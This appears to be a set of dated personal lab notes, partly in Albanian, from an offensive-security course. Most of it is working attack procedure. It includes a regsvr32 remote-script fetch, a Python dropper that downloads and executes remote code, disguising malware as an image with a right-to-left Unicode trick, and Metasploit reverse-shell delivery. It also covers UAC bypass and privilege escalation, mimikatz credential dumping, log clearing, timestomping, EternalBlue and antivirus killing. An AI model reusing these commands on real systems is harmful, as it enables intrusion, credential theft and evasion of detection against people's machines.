rdesktop -g 1280x1024 172.16.50.96 === || === || === || === || === || === || || 03.12.2018 java 3-te ne cyber || === || === || === || === || === || === || OSF forensics - tool per forensics === || === || === || === || === || === || || 05.12.2018 || === || === || === || === || === || === || sjam kon === || === || === || === || === || === || || 07.12.2018 || === || === || === || === || === || === || sjam kon === || === || === || === || === || === || || 10.12.2018 || === || === || === || === || === || === || me setup malware reverse per: regsvr32 /s /n /u /i:http://172.16.65.141:8080/.sct scrobj.dll task schedule run persistence (ne metasploit) me kriju malware ne GO platform apo gjuhe right to left unicode jpg to ico #online convert change file icon with malware icon file created installing python in windows: download .exe or .msi install setup variables in windows: ne system properties, advanced, enviroment variables system variables, path(;C:\Python27) install pip: cd C:\Python27\Scripts pip.exe install pyinstaller | dir | check if pip.exe install pyinstaller is there setup variables in windows: ne system properties, advanced, enviroment variables system variables, edit variable value: ;C:\Python27\;C:\Python27\Scripts cd C:\Users\Lab\Desktop pyinstaller --onefile mlw.py --icon img.ico copy right to left symbol from character map rename mlw.exe to mlwgnp.exe than paste character in front of png.exe #e ktehn ne mlwexe.png C:/python2.7\Tools\scripts> --ico msf > use exploit/multi/script/web_delivery >show targets > set target 0 > set payload python/meterpreter/reverese_tcp > set lhost 172.16.65.141 > set uripath / > exploit te nje terminal i ri ../ #to execute na jep session :) edito mlw.py import sys import urllib2 r=urllib2.urlopen("http://172.16.60.99:8080/") exec(r.read()) me transferu ne windows: python -m SimpleHTTPServer 80 C:>python mlw.py #te jep session ##now compile to exe c:>pyinstaller --onefile mlw.py wget http://172.16.60.99:8080 echo "paste content of index.html | base64 -d copy content of script found nano mlw2.py / paste script here python mlw2.py / te jep session cp to /var/www copy to windows pyinstaller --onefile mlw2.py #from location where file is downloaded cd dist mlw2.exe #to execute ##error kur execute ne windows, script problem fuser -k 80/tcp msf > use exploit/multi/script/web_delivery >show targets > set target 3 > set lhost 172.16.65.141 > set uripath / > set payload windows/meterpreter/reverse_tcp > exploit sessions sessionons -i getuid run persistence --help > use exploit/multi/handler === || === || === || === || === || === || 12.12.2018 || === || === || === || === || === || === || ## me marr session me metasploit permes PHP use multi/script/web_delivery show targets set target 1 set lhost xx set payload php/meterpreter/reverse_tcp set uripath / exploit ##generate some output string ne new terminal execute php -d "script" te vjen sessioni :) ##debug qa po ndodh **single stage attack nano info.txt paste script wget http://172.16.50.161:8080/ cat index.html mv index.html index.php firefox http://127.0.0.1/ te vjen session :) session -i sessions -k 2 ============================== ## me marr session me metasploit permes PSH set target 2 show options set payload windows/meterpreter/reverse_tcp show option jobs -k exploit /e gjeneron nje link nano file / paste the link nano index.html /paste the url browse 172.16.50.161 /copy the link ne cmd paste the link :) te jep session sessions -i x getuid >run post/windoes/manage/enable_rdp >run post/windoes/manage/ meny options ======================================== ##payload_inject ## nje session existues e duplifikon > use exploit multi/handler > set payload windows/meterpreter/reverse_tcp > set lport xx > set lhost xx > exploit -j #silent meterpreter> background > run post/windows/manage/payload_inject > set payload windows/meterpreter/reverse_tcp > set lport xx > set lhost xx > set session x > exploit :) e duplikon session meterpreter> getuid meterpreter> shell meterpreter> background > user exploit/windows/local/bypassuac > set session 1 > exploit > set lport xx > show advanced > exploit :) te jep session meterpreter> getuid meterpreter> getsystem meterpreter> getuid meterpreter>show_mount meterpreter> ps #process liste ##clearing the logs and important of logs meterpreter> clearev #clear logs ## me lexu ne memory, read live credentials meterpreter> kiwi ## explore the tool, similar mimikatz meterpreter> lsa_dump_sam meterpreter> load mimikatz ## important of time file used and file time modified meterpreter>timwstomp nc.exe ##find files recently accessed, it modified the time used **siem analyze **malware analyses **behavior analyses ## ask injection meterpreter> > user exploit/win/local/ask >set lhost >set lport >exploit meterpreter> getuid meterpreter> getsystem >exploit ======================================== ##Unicorn.py python unicorn.py windows/meterpreter/reverse_tcp 172.16.59.161 666 macro msfconsole -r unicorn.rc cat powershell_attack.txt === || === || === || === || === || === || || 14.12.2018 || === || === || === || === || === || === || ## malware of the future ## AI ## polymorphic malware, to read during holiday ## autorun script resource ## me lexu prej nje file ne msfconsole eternalblue use exploit/windows/smb/ms17_010_eternalblue set payload/windows/x64/meterpreter/reverse_tcp set rhost IP set lport port use exploit/multi/handler set ExitOnSession false set PAYLOAD windows/meterpreter/reverse_tcp set EXITFUNC thread set LHOST localhost set LPORT 4445 set AutoRunScript post/windows/manage/killav exploit -j msf > use exploit/multi/script/web_delivery > set TARGET 3 > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST > show options > exploit session -c "command" session -c "whoami"